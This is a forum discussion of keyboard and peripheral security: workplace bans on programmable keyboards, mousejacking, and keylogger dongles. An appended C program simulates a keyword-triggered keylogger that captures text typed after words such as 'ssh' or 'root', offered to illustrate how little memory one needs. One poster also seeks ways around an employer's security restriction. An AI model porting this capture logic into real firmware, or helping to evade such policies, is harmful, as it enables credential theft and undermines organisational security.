obvious enough that this has gone so far as to result in a complete ban of keyboards with custom controllers (among other peripherals) and the creation of an 'approved peripherals' list at my workplace.
Whether or not it's stupid, whether or not it's something that needs to be worried about, it's something that IS being worried about by my infosec team. Any keyboard with good macro support (not just custom ones) carries more risk than the standard dumb commercial board.
Does it, really?
First, commercial keyboards usually have flashable firmware too... I know Logitech's do. I haven't looked into the possibility of putting a hacked firmware on a commercial keyboard, but if I were a spy, I think I'd spend some time on this. There are far more targets that could be hacked because of a common commercial keyboard than because of an Ergodox...
Besides, I hope your infosec team banned all wireless devices? Because if you want a common weakness, commercial wireless keyboards and mice are a really common way to hack someone.
See for example Mousejacking:
A $15 antenna, and you can hack a lot of people in a 100-200m radius who use a wireless radio mouse...
^^ This is the type of information I'm looking for. Comments and suggestions on how I can make a custom keyboard that beats the restriction of "it can't be re-programmable".
Well, commercial keyboards are re-programmable
If your infosec people are worried about a villain reflashing a keyboard with malware, these things will give them nightmares.
That's actually a real threat...
I used one of those to demonstrate to my school how dangerous their practices were. They asked teachers to log in in the classroom to enter the people who weren't there. Problem: even if there's an "in-classroom" mode with limited access, it's the same password. And the password protects everything, including marks and exam results.
Worse, computers are enclosed in desks, and it's a nightmare to check whether there's a dongle between the keyboard and the computer. In a couple of minutes, a student can install it, but you can't spend 5 minutes moving the PC each time you log in to check that there's no dongle.
Anyway, what would be the malicious function of a keyboard controller? A keylogger? I doubt it, if the controller is an ordinary Teensy or Pro Micro, because the on-board memory is tiny.
It's sufficient, though...
Just record the 20-30 characters that follow a couple of words (like su, ssh, root, admin or a set of logins) and even with a couple hundred bytes of memory, you should be able to get passwords.
Maybe I'm paranoid, but each time I use a password on a public computer (internet cafes, for example), I open a notepad alongside the browser, and I use the mouse between keystrokes. So the characters are entered in the wrong order on the keyboard, some are put in the notepad, some in the browser.
So they may know that my password is 15 characters out of 30, in a different order. Good luck to anyone using keyloggers. It's a hassle, but it makes me feel better.
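As an added illustration of the point made in the post above (this is not code from the poster or from any keyboard project), here is a host-side C simulation of a keyword-triggered capture of the kind described: it watches for a few trigger words and keeps only the characters typed after each one. The trigger list, the 32-character window, the four capture slots and the constructed keystroke streams are all assumptions for the demonstration; a real controller would get its characters from the matrix scanner rather than from a string.

```c
#include <ctype.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Host-side simulation of a keyword-triggered keystroke capture, to show
 * how little RAM such a logger needs. Sizes and trigger words are assumed
 * for the demonstration; they are not taken from any real firmware. */

#define CAPTURE_LEN 32          /* characters kept after each trigger word */
#define NUM_SLOTS   4           /* independent captures before state is full */
#define WORD_MAX    7           /* longest word we bother to compare */

/* Words that typically precede a credential on a command line (assumed list). */
static const char *const triggers[] = { "su", "ssh", "root", "admin" };

struct capture {
    char    data[CAPTURE_LEN + 1];
    uint8_t len;
};

static struct capture slots[NUM_SLOTS];   /* 4 * 34 = 136 bytes of state */
static uint8_t next_slot;                 /* first unused slot */
static int8_t  recording = -1;            /* slot being filled, or -1 */

static char    word[WORD_MAX + 1];        /* word currently being typed */
static uint8_t word_len;
static uint8_t word_overflow;             /* word longer than WORD_MAX: never a trigger */

void keylog_reset(void)
{
    memset(slots, 0, sizeof slots);
    next_slot = 0;
    recording = -1;
    word_len = 0;
    word_overflow = 0;
}

/* Called at a word boundary: start a capture if the finished word is a trigger. */
static void end_word(void)
{
    size_t i;
    word[word_len] = '\0';
    if (!word_overflow && recording < 0 && next_slot < NUM_SLOTS) {
        for (i = 0; i < sizeof triggers / sizeof triggers[0]; i++) {
            if (strcmp(word, triggers[i]) == 0) {
                recording = (int8_t)next_slot++;
                break;
            }
        }
    }
    word_len = 0;
    word_overflow = 0;
}

/* One keystroke, already translated to ASCII. */
void keylog_key(char c)
{
    if (isalnum((unsigned char)c)) {
        if (word_len < WORD_MAX)
            word[word_len++] = (char)tolower((unsigned char)c);
        else
            word_overflow = 1;
    } else if (word_len > 0 || word_overflow) {
        end_word();             /* may switch recording on from this keystroke onward */
    }

    if (recording >= 0) {
        struct capture *s = &slots[recording];
        s->data[s->len++] = c;
        s->data[s->len] = '\0';
        if (s->len == CAPTURE_LEN)
            recording = -1;     /* slot full: stop until the next trigger word */
    }
}

void keylog_feed(const char *stream)
{
    while (*stream)
        keylog_key(*stream++);
}

const char *keylog_slot(int i)
{
    return (i >= 0 && i < NUM_SLOTS) ? slots[i].data : "";
}

/* RAM used by the logger's state: slots, word buffer and the four counters. */
size_t keylog_footprint(void)
{
    return sizeof slots + sizeof word + 4;
}

int main(void)
{
    /* Constructed keystroke stream: a shell session with a login. */
    keylog_reset();
    keylog_feed("ls -la\nssh root@example.com\nhunter2\nexit\n");
    printf("captured after trigger: [%s]\n", keylog_slot(0));
    printf("logger state uses about %zu bytes\n", keylog_footprint());
    return 0;
}
```

The whole state fits in about 150 bytes, which is why a small on-board memory is no obstacle. It also shows why the interleaved-typing trick in the post works: a slot holds only what reached the keyboard after the trigger, in the order it was typed, so characters moved elsewhere with the mouse and decoy characters typed into the notepad land in the same slot and the attacker has to guess which subset, in which order, is the real password.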